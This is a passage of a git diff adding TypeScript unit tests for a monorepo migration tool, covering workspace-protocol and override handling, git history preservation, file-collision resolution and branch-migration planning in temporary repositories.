'workspace:*'); + + expect(updates).toEqual([ + { + packageName: 'pkg-a', + dependency: 'pkg-b', + from: '^1.0.0', + to: 'workspace:*', + }, + ]); + }); + + it('should skip dependencies already using workspace protocol', () => { + const packages: PackageInfo[] = [ + createPackageInfo('pkg-a', { + dependencies: { 'pkg-b': 'workspace:*' }, + }), + createPackageInfo('pkg-b'), + ]; + + 
const updates = normalizeToWorkspaceProtocol({}, packages, 'workspace:*'); + + expect(updates).toEqual([]); + }); + }); + + describe('applyOverridesToPackageJson', () => { + it('should nest overrides under pnpm.overrides for pnpm', () => { + const rootPkgJson = { name: 'monorepo', version: '1.0.0' }; + const overrides = { lodash: '^4.17.21' }; + + const result = applyOverridesToPackageJson(rootPkgJson, overrides, 'pnpm'); + + expect(result.pnpm).toEqual({ overrides: { lodash: '^4.17.21' } }); + }); + + it('should place overrides at top level for npm', () => { + const rootPkgJson = { name: 'monorepo', version: '1.0.0' }; + const overrides = { react: '^18.0.0' }; + + const result = applyOverridesToPackageJson(rootPkgJson, overrides, 'npm'); + + expect(result.overrides).toEqual({ react: '^18.0.0' }); + expect(result).not.toHaveProperty('pnpm'); + }); + + it('should place resolutions at top level for yarn', () => { + const rootPkgJson = { name: 'monorepo', version: '1.0.0' }; + const overrides = { react: '^18.0.0' }; + + const result = applyOverridesToPackageJson(rootPkgJson, overrides, 'yarn'); + + expect(result.resolutions).toEqual({ react: '^18.0.0' }); + }); + }); + + describe('verifyEnforcement', () => { + it('should return a pass check when pnpm overrides are present', async () => { + const fixturePath = await createTempFixture({ + name: 'enforcement-pass', + packageJson: { + name: 'monorepo', + version: '1.0.0', + pnpm: { + overrides: { + lodash: '^4.17.21', + }, + }, + }, + }); + + const checks = await verifyEnforcement(fixturePath, 'pnpm'); + + expect(checks).toHaveLength(1); + expect(checks[0].status).toBe('pass'); + expect(checks[0].id).toBe('enforcement-overrides-present'); + }); + + it('should return a warn check when overrides are missing', async () => { + const fixturePath = await createTempFixture({ + name: 'enforcement-warn', + packageJson: { + name: 'monorepo', + version: '1.0.0', + }, + }); + + const checks = await verifyEnforcement(fixturePath, 
'pnpm'); + + expect(checks).toHaveLength(1); + expect(checks[0].status).toBe('warn'); + expect(checks[0].id).toBe('enforcement-overrides-missing'); + }); + + it('should return a fail check when no root package.json exists', async () => { + const fixturePath = await createTempFixture({ + name: 'enforcement-fail', + files: { + 'src/index.ts': 'export const x = 1;', + }, + }); + + const checks = await verifyEnforcement(fixturePath, 'pnpm'); + + expect(checks).toHaveLength(1); + expect(checks[0].status).toBe('fail'); + expect(checks[0].id).toBe('enforcement-no-root-pkg'); + }); + + it('should return pass when npm overrides are present', async () => { + const fixturePath = await createTempFixture({ + name: 'enforcement-npm-pass', + packageJson: { + name: 'monorepo', + version: '1.0.0', + overrides: { + lodash: '^4.17.21', + }, + }, + }); + + const checks = await verifyEnforcement(fixturePath, 'npm'); + + expect(checks).toHaveLength(1); + expect(checks[0].status).toBe('pass'); + expect(checks[0].message).toContain('overrides'); + }); + + it('should return warn when npm overrides are missing', async () => { + const fixturePath = await createTempFixture({ + name: 'enforcement-npm-warn', + packageJson: { + name: 'monorepo', + version: '1.0.0', + }, + }); + + const checks = await verifyEnforcement(fixturePath, 'npm'); + + expect(checks).toHaveLength(1); + expect(checks[0].status).toBe('warn'); + expect(checks[0].id).toBe('enforcement-overrides-missing'); + }); + + it('should return pass when yarn resolutions are present', async () => { + const fixturePath = await createTempFixture({ + name: 'enforcement-yarn-pass', + packageJson: { + name: 'monorepo', + version: '1.0.0', + resolutions: { + react: '^18.0.0', + }, + }, + }); + + const checks = await verifyEnforcement(fixturePath, 'yarn'); + + expect(checks).toHaveLength(1); + expect(checks[0].status).toBe('pass'); + expect(checks[0].message).toContain('resolutions'); + }); + + it('should return warn when yarn resolutions are 
missing', async () => { + const fixturePath = await createTempFixture({ + name: 'enforcement-yarn-warn', + packageJson: { + name: 'monorepo', + version: '1.0.0', + }, + }); + + const checks = await verifyEnforcement(fixturePath, 'yarn'); + + expect(checks).toHaveLength(1); + expect(checks[0].status).toBe('warn'); + expect(checks[0].details).toContain('resolutions'); + }); + + it('should return warn when pnpm overrides object is empty', async () => { + const fixturePath = await createTempFixture({ + name: 'enforcement-empty-overrides', + packageJson: { + name: 'monorepo', + version: '1.0.0', + pnpm: { overrides: {} }, + }, + }); + + const checks = await verifyEnforcement(fixturePath, 'pnpm'); + + expect(checks).toHaveLength(1); + expect(checks[0].status).toBe('warn'); + }); + + it('should return warn when npm overrides object is empty', async () => { + const fixturePath = await createTempFixture({ + name: 'enforcement-npm-empty', + packageJson: { + name: 'monorepo', + version: '1.0.0', + overrides: {}, + }, + }); + + const checks = await verifyEnforcement(fixturePath, 'npm'); + + expect(checks).toHaveLength(1); + expect(checks[0].status).toBe('warn'); + }); + + it('should handle malformed package.json gracefully', async () => { + const fixturePath = await createTempFixture({ + name: 'enforcement-malformed', + files: { + 'package.json': '{ invalid json !!!', + }, + }); + + const checks = await verifyEnforcement(fixturePath, 'pnpm'); + + expect(checks).toHaveLength(1); + expect(checks[0].status).toBe('fail'); + expect(checks[0].id).toBe('enforcement-parse-error'); + }); + }); +}); diff --git a/tests/unit/strategies/history-preserve.test.ts b/tests/unit/strategies/history-preserve.test.ts index 65b8c29..8f04cb3 100644 --- a/tests/unit/strategies/history-preserve.test.ts +++ b/tests/unit/strategies/history-preserve.test.ts @@ -6,6 +6,9 @@ import os from 'node:os'; import crypto from 'node:crypto'; import { checkGitFilterRepo, + checkHistoryPrerequisites, + 
historyDryRun, + preserveHistory, getCommitCount, getContributors, } from '../../../src/strategies/history-preserve.js'; @@ -85,4 +88,364 @@ describe('history-preserve', () => { expect(Array.isArray(contributors)).toBe(true); }); }); + + describe('checkHistoryPrerequisites', () => { + let tempDir: string; + + beforeEach(async () => { + tempDir = path.join(os.tmpdir(), `test-prereq-${crypto.randomBytes(8).toString('hex')}`); + await fs.ensureDir(tempDir); + }); + + afterEach(async () => { + await fs.remove(tempDir); + }); + + it('should report issues for non-git directory', async () => { + const result = await checkHistoryPrerequisites(tempDir); + expect(result.ok).toBe(false); + expect(result.issues.some((i) => i.includes('not a git repository'))).toBe(true); + }); + + it('should pass for a valid git repo', async () => { + execSync('git init', { cwd: tempDir, stdio: 'pipe' }); + execSync('git config user.email "test@test.com"', { cwd: tempDir, stdio: 'pipe' }); + execSync('git config user.name "Test"', { cwd: tempDir, stdio: 'pipe' }); + await fs.writeFile(path.join(tempDir, 'test.txt'), 'content'); + execSync('git add .', { cwd: tempDir, stdio: 'pipe' }); + execSync('git commit -m "init"', { cwd: tempDir, stdio: 'pipe' }); + + const result = await checkHistoryPrerequisites(tempDir); + // May or may not have git-filter-repo installed, but should report status + expect(typeof result.ok).toBe('boolean'); + expect(Array.isArray(result.issues)).toBe(true); + }); + + it('should report shallow clone issue', async () => { + // Create a source repo + const source = path.join(tempDir, 'source'); + await fs.ensureDir(source); + execSync('git init', { cwd: source, stdio: 'pipe' }); + execSync('git config user.email "test@test.com"', { cwd: source, stdio: 'pipe' }); + execSync('git config user.name "Test"', { cwd: source, stdio: 'pipe' }); + await fs.writeFile(path.join(source, 'test.txt'), 'content'); + execSync('git add .', { cwd: source, stdio: 'pipe' }); + execSync('git 
commit -m "init"', { cwd: source, stdio: 'pipe' }); + + // Create shallow clone + const shallow = path.join(tempDir, 'shallow'); + execSync(`git clone --depth 1 file://${source} ${shallow}`, { stdio: 'pipe' }); + + const result = await checkHistoryPrerequisites(shallow); + expect(result.issues.some((i) => i.includes('shallow clone'))).toBe(true); + }); + }); + + describe('historyDryRun', () => { + let tempDir: string; + + beforeEach(async () => { + tempDir = path.join(os.tmpdir(), `test-dryrun-${crypto.randomBytes(8).toString('hex')}`); + await fs.ensureDir(tempDir); + }); + + afterEach(async () => { + await fs.remove(tempDir); + }); + + it('should return commit count and contributors for a git repo', async () => { + execSync('git init', { cwd: tempDir, stdio: 'pipe' }); + execSync('git config user.email "dev@example.com"', { cwd: tempDir, stdio: 'pipe' }); + execSync('git config user.name "Developer"', { cwd: tempDir, stdio: 'pipe' }); + await fs.writeFile(path.join(tempDir, 'file.txt'), 'v1'); + execSync('git add . && git commit -m "first"', { cwd: tempDir, stdio: 'pipe' }); + await fs.writeFile(path.join(tempDir, 'file2.txt'), 'v2'); + execSync('git add . 
&& git commit -m "second"', { cwd: tempDir, stdio: 'pipe' }); + + const result = await historyDryRun(tempDir, 'packages/mylib'); + expect(result.commitCount).toBe(2); + expect(result.contributors.length).toBeGreaterThanOrEqual(1); + expect(result.estimatedSeconds).toBeGreaterThanOrEqual(1); + expect(result.strategy).toMatch(/^(filter-repo|subtree)$/); + expect(typeof result.hasFilterRepo).toBe('boolean'); + }); + + it('should return zero for non-git directory', async () => { + const result = await historyDryRun(tempDir, 'packages/mylib'); + expect(result.commitCount).toBe(0); + expect(result.contributors).toEqual([]); + }); + }); + + describe('preserveHistory', () => { + let tempDir: string; + + beforeEach(async () => { + tempDir = path.join(os.tmpdir(), `test-preserve-${crypto.randomBytes(8).toString('hex')}`); + await fs.ensureDir(tempDir); + }); + + afterEach(async () => { + await fs.remove(tempDir); + }); + + it('should copy files when source is not a git repo', async () => { + const source = path.join(tempDir, 'source'); + const output = path.join(tempDir, 'output'); + await fs.ensureDir(source); + await fs.ensureDir(output); + await fs.writeFile(path.join(source, 'index.ts'), 'export const x = 1;'); + + await preserveHistory(source, output, { + targetDir: 'packages/mylib', + rewritePaths: true, + }); + + expect(await fs.pathExists(path.join(output, 'packages/mylib/index.ts'))).toBe(true); + }); + + it('should initialize git in output if not a git repo', async () => { + const source = path.join(tempDir, 'source'); + const output = path.join(tempDir, 'output'); + await fs.ensureDir(source); + await fs.ensureDir(output); + + // Create a proper git repo for source + execSync('git init', { cwd: source, stdio: 'pipe' }); + execSync('git config user.email "test@test.com"', { cwd: source, stdio: 'pipe' }); + execSync('git config user.name "Test"', { cwd: source, stdio: 'pipe' }); + await fs.writeFile(path.join(source, 'index.ts'), 'export default 1;'); + 
execSync('git add .', { cwd: source, stdio: 'pipe' }); + execSync('git commit -m "init"', { cwd: source, stdio: 'pipe' }); + + await preserveHistory(source, output, { + targetDir: 'packages/mylib', + rewritePaths: false, + }); + + // Output should now be a git repo + expect(await fs.pathExists(path.join(output, '.git'))).toBe(true); + }); + + it('should preserve history with subtree strategy', async () => { + const source = path.join(tempDir, 'source'); + const output = path.join(tempDir, 'output'); + await fs.ensureDir(source); + await fs.ensureDir(output); + + // Create source repo + execSync('git init', { cwd: source, stdio: 'pipe' }); + execSync('git config user.email "test@test.com"', { cwd: source, stdio: 'pipe' }); + execSync('git config user.name "Test"', { cwd: source, stdio: 'pipe' }); + await fs.writeFile(path.join(source, 'README.md'), '# Source'); + execSync('git add .', { cwd: source, stdio: 'pipe' }); + execSync('git commit -m "initial source"', { cwd: source, stdio: 'pipe' }); + + // Use rewritePaths: false to force subtree strategy (filter-repo may not be installed) + await preserveHistory(source, output, { + targetDir: 'packages/source', + rewritePaths: false, + }); + + // Check that the output has git history + const logOutput = execSync('git log --oneline', { cwd: output, encoding: 'utf-8' }); + expect(logOutput.trim().split('\n').length).toBeGreaterThanOrEqual(1); + }); + + it('should handle source repo with master branch', async () => { + const source = path.join(tempDir, 'source-master'); + const output = path.join(tempDir, 'output-master'); + await fs.ensureDir(source); + await fs.ensureDir(output); + + // Create source repo on "master" branch + execSync('git init -b master', { cwd: source, stdio: 'pipe' }); + execSync('git config user.email "test@test.com"', { cwd: source, stdio: 'pipe' }); + execSync('git config user.name "Test"', { cwd: source, stdio: 'pipe' }); + await fs.writeFile(path.join(source, 'lib.ts'), 'export const x = 1;'); + 
execSync('git add .', { cwd: source, stdio: 'pipe' }); + execSync('git commit -m "initial on master"', { cwd: source, stdio: 'pipe' }); + + await preserveHistory(source, output, { + targetDir: 'packages/lib', + rewritePaths: false, + }); + + expect(await fs.pathExists(path.join(output, '.git'))).toBe(true); + const logOutput = execSync('git log --oneline', { cwd: output, encoding: 'utf-8' }); + expect(logOutput.trim().split('\n').length).toBeGreaterThanOrEqual(1); + }); + + it('should copy files for git repo with no commits (fallback)', async () => { + const source = path.join(tempDir, 'source-empty'); + const output = path.join(tempDir, 'output-empty'); + await fs.ensureDir(source); + await fs.ensureDir(output); + + // Create a git repo with no commits + execSync('git init', { cwd: source, stdio: 'pipe' }); + await fs.writeFile(path.join(source, 'file.txt'), 'untracked content'); + + // Init output as git repo too + execSync('git init', { cwd: output, stdio: 'pipe' }); + execSync('git config user.email "test@test.com"', { cwd: output, stdio: 'pipe' }); + execSync('git config user.name "Test"', { cwd: output, stdio: 'pipe' }); + execSync('git commit --allow-empty -m "init"', { cwd: output, stdio: 'pipe' }); + + await preserveHistory(source, output, { + targetDir: 'packages/empty', + rewritePaths: false, + }); + + // Should have copied the file into the target dir + expect(await fs.pathExists(path.join(output, 'packages/empty/file.txt'))).toBe(true); + }); + + it('should preserve history when output already has commits', async () => { + const source = path.join(tempDir, 'source-existing'); + const output = path.join(tempDir, 'output-existing'); + await fs.ensureDir(source); + await fs.ensureDir(output); + + // Create source repo + execSync('git init', { cwd: source, stdio: 'pipe' }); + execSync('git config user.email "test@test.com"', { cwd: source, stdio: 'pipe' }); + execSync('git config user.name "Test"', { cwd: source, stdio: 'pipe' }); + await 
fs.writeFile(path.join(source, 'src.ts'), 'source code'); + execSync('git add .', { cwd: source, stdio: 'pipe' }); + execSync('git commit -m "source commit"', { cwd: source, stdio: 'pipe' }); + + // Create output repo with existing content + execSync('git init', { cwd: output, stdio: 'pipe' }); + execSync('git config user.email "test@test.com"', { cwd: output, stdio: 'pipe' }); + execSync('git config user.name "Test"', { cwd: output, stdio: 'pipe' }); + await fs.writeFile(path.join(output, 'existing.txt'), 'existing content'); + execSync('git add .', { cwd: output, stdio: 'pipe' }); + execSync('git commit -m "existing commit"', { cwd: output, stdio: 'pipe' }); + + await preserveHistory(source, output, { + targetDir: 'packages/imported', + rewritePaths: false, + }); + + // Both the existing file and imported file should exist + expect(await fs.pathExists(path.join(output, 'existing.txt'))).toBe(true); + expect(await fs.pathExists(path.join(output, 'packages/imported/src.ts'))).toBe(true); + + // Should have multiple commits + const logOutput = execSync('git log --oneline', { cwd: output, encoding: 'utf-8' }); + expect(logOutput.trim().split('\n').length).toBeGreaterThanOrEqual(2); + }); + + it('should preserve history with filter-repo when rewritePaths is true', async () => { + const hasFilterRepo = await checkGitFilterRepo(); + if (!hasFilterRepo) { + // Skip if git-filter-repo not installed + return; + } + + const source = path.join(tempDir, 'source-filter'); + const output = path.join(tempDir, 'output-filter'); + await fs.ensureDir(source); + await fs.ensureDir(output); + + // Create source repo + execSync('git init', { cwd: source, stdio: 'pipe' }); + execSync('git config user.email "test@test.com"', { cwd: source, stdio: 'pipe' }); + execSync('git config user.name "Test"', { cwd: source, stdio: 'pipe' }); + await fs.writeFile(path.join(source, 'lib.ts'), 'export const lib = 1;'); + execSync('git add .', { cwd: source, stdio: 'pipe' }); + execSync('git commit -m 
"add lib"', { cwd: source, stdio: 'pipe' }); + + await preserveHistory(source, output, { + targetDir: 'packages/mylib', + rewritePaths: true, + }); + + // The file should be under the targetDir + expect(await fs.pathExists(path.join(output, 'packages/mylib/lib.ts'))).toBe(true); + expect(await fs.pathExists(path.join(output, '.git'))).toBe(true); + }); + + it('should preserve history with filter-repo and commit prefix', async () => { + const hasFilterRepo = await checkGitFilterRepo(); + if (!hasFilterRepo) return; + + const source = path.join(tempDir, 'source-prefix'); + const output = path.join(tempDir, 'output-prefix'); + await fs.ensureDir(source); + await fs.ensureDir(output); + + execSync('git init', { cwd: source, stdio: 'pipe' }); + execSync('git config user.email "test@test.com"', { cwd: source, stdio: 'pipe' }); + execSync('git config user.name "Test"', { cwd: source, stdio: 'pipe' }); + await fs.writeFile(path.join(source, 'app.ts'), 'export const app = true;'); + execSync('git add .', { cwd: source, stdio: 'pipe' }); + execSync('git commit -m "init app"', { cwd: source, stdio: 'pipe' }); + + await preserveHistory(source, output, { + targetDir: 'packages/app', + rewritePaths: true, + commitPrefix: '[app] ', + }); + + expect(await fs.pathExists(path.join(output, 'packages/app/app.ts'))).toBe(true); + const logOutput = execSync('git log --oneline', { cwd: output, encoding: 'utf-8' }); + expect(logOutput).toContain('[app]'); + }); + + it('should handle subtree with non-standard branch name', async () => { + const source = path.join(tempDir, 'source-custom-branch'); + const output = path.join(tempDir, 'output-custom-branch'); + await fs.ensureDir(source); + await fs.ensureDir(output); + + // Create source repo with a custom branch name + execSync('git init -b develop', { cwd: source, stdio: 'pipe' }); + execSync('git config user.email "test@test.com"', { cwd: source, stdio: 'pipe' }); + execSync('git config user.name "Test"', { cwd: source, stdio: 'pipe' }); 
+ await fs.writeFile(path.join(source, 'util.ts'), 'export const util = 1;'); + execSync('git add .', { cwd: source, stdio: 'pipe' }); + execSync('git commit -m "init on develop"', { cwd: source, stdio: 'pipe' }); + + await preserveHistory(source, output, { + targetDir: 'packages/util', + rewritePaths: false, + }); + + expect(await fs.pathExists(path.join(output, 'packages/util/util.ts'))).toBe(true); + }); + + it('should handle multiple sequential imports via subtree', async () => { + const source1 = path.join(tempDir, 'source1'); + const source2 = path.join(tempDir, 'source2'); + const output = path.join(tempDir, 'output-multi'); + await fs.ensureDir(source1); + await fs.ensureDir(source2); + await fs.ensureDir(output); + + // Create two source repos + for (const [src, name] of [[source1, 'src1'], [source2, 'src2']] as const) { + execSync('git init', { cwd: src, stdio: 'pipe' }); + execSync('git config user.email "test@test.com"', { cwd: src, stdio: 'pipe' }); + execSync('git config user.name "Test"', { cwd: src, stdio: 'pipe' }); + await fs.writeFile(path.join(src, `${name}.ts`), `export const ${name} = 1;`); + execSync('git add .', { cwd: src, stdio: 'pipe' }); + execSync(`git commit -m "init ${name}"`, { cwd: src, stdio: 'pipe' }); + } + + // Import both into the same output + await preserveHistory(source1, output, { + targetDir: 'packages/source1', + rewritePaths: false, + }); + await preserveHistory(source2, output, { + targetDir: 'packages/source2', + rewritePaths: false, + }); + + expect(await fs.pathExists(path.join(output, 'packages/source1/src1.ts'))).toBe(true); + expect(await fs.pathExists(path.join(output, 'packages/source2/src2.ts'))).toBe(true); + }); + }); }); diff --git a/tests/unit/strategies/merge-files.test.ts b/tests/unit/strategies/merge-files.test.ts index fa18ced..f3d94c8 100644 --- a/tests/unit/strategies/merge-files.test.ts +++ b/tests/unit/strategies/merge-files.test.ts @@ -8,8 +8,9 @@ import { mergeIgnoreFiles, generateRootReadme, 
handleFileCollision, + resolveFileCollisionToContent, } from '../../../src/strategies/merge-files.js'; -import type { FileCollision } from '../../../src/types/index.js'; +import type { FileCollision, PackageManagerConfig } from '../../../src/types/index.js'; describe('Merge Files Strategies', () => { let testDir: string; @@ -132,6 +133,22 @@ describe('Merge Files Strategies', () => { const result = generateRootReadme(['pkg'], 'packages'); expect(result.toLowerCase()).toContain('monorepo'); }); + + it('should use custom PM config commands', () => { + const pmConfig: PackageManagerConfig = { + type: 'yarn', + installCommand: 'yarn install', + addCommand: 'yarn add', + runCommand: 'yarn', + runAllCommand: (script: string) => `yarn workspaces foreach run ${script}`, + execCommand: 'yarn', + }; + const result = generateRootReadme(['pkg-a'], 'packages', pmConfig); + expect(result).toContain('yarn install'); + expect(result).toContain('yarn workspaces foreach run build'); + // yarn != pnpm so no pnpm-workspace.yaml + expect(result).not.toContain('pnpm-workspace.yaml'); + }); }); describe('handleFileCollision', () => { @@ -238,6 +255,27 @@ describe('Merge Files Strategies', () => { expect(files.length).toBeGreaterThanOrEqual(2); }); + it('should handle merge strategy for non-gitignore files', async () => { + const repos = await setupRepos({ + 'repo-a': { '.npmignore': 'dist/\nnode_modules/' }, + 'repo-b': { '.npmignore': 'build/\nnode_modules/' }, + }); + + const collision = createCollision('.npmignore', ['repo-a', 'repo-b']); + const outputDir = path.join(testDir, 'output'); + await fs.ensureDir(outputDir); + + await handleFileCollision(collision, 'merge', repos, outputDir); + + const result = await fs.readFile( + path.join(outputDir, '.npmignore'), + 'utf-8' + ); + expect(result).toContain('dist'); + expect(result).toContain('build'); + expect(result).toContain('node_modules'); + }); + it('should handle skip strategy', async () => { const repos = await setupRepos({ 
'repo-a': { 'skip.txt': 'content' }, @@ -254,4 +292,93 @@ describe('Merge Files Strategies', () => { expect(await fs.pathExists(path.join(outputDir, 'skip.txt'))).toBe(false); }); }); + + describe('resolveFileCollisionToContent', () => { + const setupReposForResolve = async ( + files: Record<string, Record<string, string>> + ): Promise<Array<{ path: string; name: string }>> => { + const repos: Array<{ path: string; name: string }> = []; + + for (const [name, repoFiles] of Object.entries(files)) { + const repoDir = path.join(testDir, 'resolve-packages', name); + await fs.ensureDir(repoDir); + for (const [fileName, content] of Object.entries(repoFiles)) { + await fs.writeFile(path.join(repoDir, fileName), content); + } + repos.push({ path: repoDir, name }); + } + return repos; + }; + + it('should resolve keep-first to content', async () => { + const repos = await setupReposForResolve({ + 'repo-a': { 'README.md': '# Repo A' }, + 'repo-b': { 'README.md': '# Repo B' }, + }); + + const collision: FileCollision = { path: 'README.md', sources: ['repo-a', 'repo-b'], suggestedStrategy: 'keep-first' }; + const result = await resolveFileCollisionToContent(collision, 'keep-first', repos); + expect(result).toHaveLength(1); + expect(result[0].content).toBe('# Repo A'); + }); + + it('should resolve keep-last to content', async () => { + const repos = await setupReposForResolve({ + 'repo-a': { 'README.md': '# Repo A' }, + 'repo-b': { 'README.md': '# Repo B' }, + }); + + const collision: FileCollision = { path: 'README.md', sources: ['repo-a', 'repo-b'], suggestedStrategy: 'keep-last' }; + const result = await resolveFileCollisionToContent(collision, 'keep-last', repos); + expect(result).toHaveLength(1); + expect(result[0].content).toBe('# Repo B'); + }); + + it('should return empty for keep-last when file missing', async () => { + const repos = [{ path: path.join(testDir, 'nonexistent'), name: 'ghost' }]; + const collision: FileCollision = { path: 'README.md', sources: ['ghost'], suggestedStrategy: 'keep-last' }; + const result = await 
resolveFileCollisionToContent(collision, 'keep-last', repos); + expect(result).toEqual([]); + }); + + it('should return empty for keep-first when file missing', async () => { + const repos = [{ path: path.join(testDir, 'nonexistent'), name: 'ghost' }]; + const collision: FileCollision = { path: 'README.md', sources: ['ghost'], suggestedStrategy: 'keep-first' }; + const result = await resolveFileCollisionToContent(collision, 'keep-first', repos); + expect(result).toEqual([]); + }); + + it('should resolve rename to content with source suffixes', async () => { + const repos = await setupReposForResolve({ + 'repo-a': { 'config.json': '{"a": 1}' }, + 'repo-b': { 'config.json': '{"b": 2}' }, + }); + + const collision: FileCollision = { path: 'config.json', sources: ['repo-a', 'repo-b'], suggestedStrategy: 'rename' }; + const result = await resolveFileCollisionToContent(collision, 'rename', repos); + expect(result).toHaveLength(2); + expect(result[0].relativePath).toContain('repo-a'); + expect(result[1].relativePath).toContain('repo-b'); + }); + + it('should resolve skip to empty array', async () => { + const repos = [{ path: testDir, name: 'any' }]; + const collision: FileCollision = { path: 'skip.txt', sources: ['any'], suggestedStrategy: 'skip' }; + const result = await resolveFileCollisionToContent(collision, 'skip', repos); + expect(result).toEqual([]); + }); + + it('should resolve merge for non-gitignore files', async () => { + const repos = await setupReposForResolve({ + 'repo-a': { '.dockerignore': 'node_modules/\n.git/' }, + 'repo-b': { '.dockerignore': 'dist/\n.git/' }, + }); + + const collision: FileCollision = { path: '.dockerignore', sources: ['repo-a', 'repo-b'], suggestedStrategy: 'merge' }; + const result = await resolveFileCollisionToContent(collision, 'merge', repos); + expect(result).toHaveLength(1); + expect(result[0].content).toContain('node_modules'); + expect(result[0].content).toContain('dist'); + }); + }); }); diff --git 
a/tests/unit/strategies/migrate-branch.test.ts b/tests/unit/strategies/migrate-branch.test.ts new file mode 100644 index 0000000..8639621 --- /dev/null +++ b/tests/unit/strategies/migrate-branch.test.ts @@ -0,0 +1,312 @@ +import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'; +import { execSync } from 'node:child_process'; +import fs from 'fs-extra'; +import path from 'node:path'; +import os from 'node:os'; +import crypto from 'node:crypto'; +import { + checkBranchMigratePrerequisites, + branchMigrateDryRun, + generateBranchPlan, + applyBranchPlan, +} from '../../../src/strategies/migrate-branch.js'; +import type { Logger } from '../../../src/types/index.js'; + +function mockLogger(): Logger { + return { + info: vi.fn(), + success: vi.fn(), + warn: vi.fn(), + error: vi.fn(), + debug: vi.fn(), + log: vi.fn(), + }; +} + +describe('migrate-branch strategy', () => { + let tempDir: string; + + beforeEach(async () => { + tempDir = path.join(os.tmpdir(), `mb-test-${crypto.randomBytes(8).toString('hex')}`); + await fs.ensureDir(tempDir); + }); + + afterEach(async () => { + await fs.remove(tempDir); + }); + + function createGitRepo(name: string, branch = 'main'): string { + const repoPath = path.join(tempDir, name); + fs.ensureDirSync(repoPath); + execSync('git init', { cwd: repoPath, stdio: 'pipe' }); + execSync('git config user.email "test@test.com"', { cwd: repoPath, stdio: 'pipe' }); + execSync('git config user.name "Test User"', { cwd: repoPath, stdio: 'pipe' }); + // Ensure we're on the expected branch + try { + execSync(`git checkout -b ${branch}`, { cwd: repoPath, stdio: 'pipe' }); + } catch { + // branch already exists + } + fs.writeFileSync(path.join(repoPath, 'README.md'), '# Test\n'); + execSync('git add .', { cwd: repoPath, stdio: 'pipe' }); + execSync('git commit -m "initial"', { cwd: repoPath, stdio: 'pipe' }); + return repoPath; + } + + describe('checkBranchMigratePrerequisites', () => { + it('should pass for valid repos with subtree 
strategy', async () => { + const source = createGitRepo('source'); + const target = createGitRepo('target'); + + const result = await checkBranchMigratePrerequisites(source, target, 'subtree'); + expect(result.ok).toBe(true); + expect(result.issues).toEqual([]); + }); + + it('should pass for valid repos with replay strategy', async () => { + const source = createGitRepo('source'); + const target = createGitRepo('target'); + + const result = await checkBranchMigratePrerequisites(source, target, 'replay'); + expect(result.ok).toBe(true); + expect(result.issues).toEqual([]); + }); + + it('should fail when source repo does not exist', async () => { + const target = createGitRepo('target'); + const nonexistent = path.join(tempDir, 'nonexistent'); + + const result = await checkBranchMigratePrerequisites(nonexistent, target, 'subtree'); + expect(result.ok).toBe(false); + expect(result.issues.some((i) => i.includes('Source repository not found'))).toBe(true); + }); + + it('should fail when target monorepo does not exist', async () => { + const source = createGitRepo('source'); + const nonexistent = path.join(tempDir, 'nonexistent'); + + const result = await checkBranchMigratePrerequisites(source, nonexistent, 'subtree'); + expect(result.ok).toBe(false); + expect(result.issues.some((i) => i.includes('Target monorepo not found'))).toBe(true); + }); + + it('should warn about shallow clones', async () => { + const source = createGitRepo('source'); + const target = createGitRepo('target'); + + // Create a shallow clone + const shallow = path.join(tempDir, 'shallow'); + execSync(`git clone --depth 1 file://${source} ${shallow}`, { stdio: 'pipe' }); + + const result = await checkBranchMigratePrerequisites(shallow, target, 'subtree'); + expect(result.issues.some((i) => i.includes('shallow clone'))).toBe(true); + }); + + it('should fail when source is not a git repo', async () => { + const nonGit = path.join(tempDir, 'not-git'); + await fs.ensureDir(nonGit); + const target = 
createGitRepo('target'); + + const result = await checkBranchMigratePrerequisites(nonGit, target, 'subtree'); + expect(result.ok).toBe(false); + expect(result.issues.some((i) => i.includes('not a valid git repository'))).toBe(true); + }); + }); + + describe('branchMigrateDryRun', () => { + it('should return commit count and contributors', async () => { + const repo = createGitRepo('source'); + // Add more commits + fs.writeFileSync(path.join(repo, 'file1.txt'), 'content1'); + execSync('git add . && git commit -m "second"', { cwd: repo, stdio: 'pipe' }); + fs.writeFileSync(path.join(repo, 'file2.txt'), 'content2'); + execSync('git add . && git commit -m "third"', { cwd: repo, stdio: 'pipe' }); + + const result = await branchMigrateDryRun(repo, 'main'); + expect(result.commitCount).toBe(3); + expect(result.contributors).toContain('Test User'); + expect(result.estimatedTime).toMatch(/\d+ seconds/); + }); + + it('should return zero for nonexistent branch', async () => { + const repo = createGitRepo('source'); + + const result = await branchMigrateDryRun(repo, 'nonexistent-branch'); + expect(result.commitCount).toBe(0); + expect(result.estimatedTime).toBe('unknown'); + expect(result.contributors).toEqual([]); + }); + + it('should estimate minutes for large repos', async () => { + const repo = createGitRepo('source'); + // Create enough commits to trigger minutes estimate (>120 commits / 0.5s = 60s) + for (let i = 0; i < 125; i++) { + fs.writeFileSync(path.join(repo, `file${i}.txt`), `content${i}`); + execSync(`git add . 
&& git commit -m "commit ${i}"`, { cwd: repo, stdio: 'pipe' }); + } + + const result = await branchMigrateDryRun(repo, 'main'); + expect(result.estimatedTime).toMatch(/minutes/); + }); + }); + + describe('generateBranchPlan', () => { + it('should generate a subtree plan', async () => { + const source = createGitRepo('source'); + const target = createGitRepo('target'); + const logger = mockLogger(); + + const plan = await generateBranchPlan('main', source, target, 'subtree', logger); + + expect(plan.schemaVersion).toBe(1); + expect(plan.branch).toBe('main'); + expect(plan.strategy).toBe('subtree'); + expect(plan.operations).toHaveLength(3); + expect(plan.operations.map((o) => o.id)).toEqual(['add-remote', 'subtree-add', 'remove-remote']); + expect(plan.dryRunReport).toBeDefined(); + expect(plan.dryRunReport!.commitCount).toBeGreaterThanOrEqual(1); + }); + + it('should generate a replay plan', async () => { + const source = createGitRepo('source'); + const target = createGitRepo('target'); + const logger = mockLogger(); + + const plan = await generateBranchPlan('main', source, target, 'replay', logger); + + expect(plan.strategy).toBe('replay'); + expect(plan.operations).toHaveLength(3); + expect(plan.operations.map((o) => o.id)).toEqual(['format-patch', 'create-branch', 'apply-patches']); + }); + + it('should throw when prerequisites fail', async () => { + const logger = mockLogger(); + const nonexistent = path.join(tempDir, 'no-such-repo'); + + await expect( + generateBranchPlan('main', nonexistent, nonexistent, 'subtree', logger), + ).rejects.toThrow('Prerequisites not met'); + }); + + it('should resolve relative paths', async () => { + const source = createGitRepo('source'); + const target = createGitRepo('target'); + const logger = mockLogger(); + + const plan = await generateBranchPlan('main', source, target, 'subtree', logger); + + 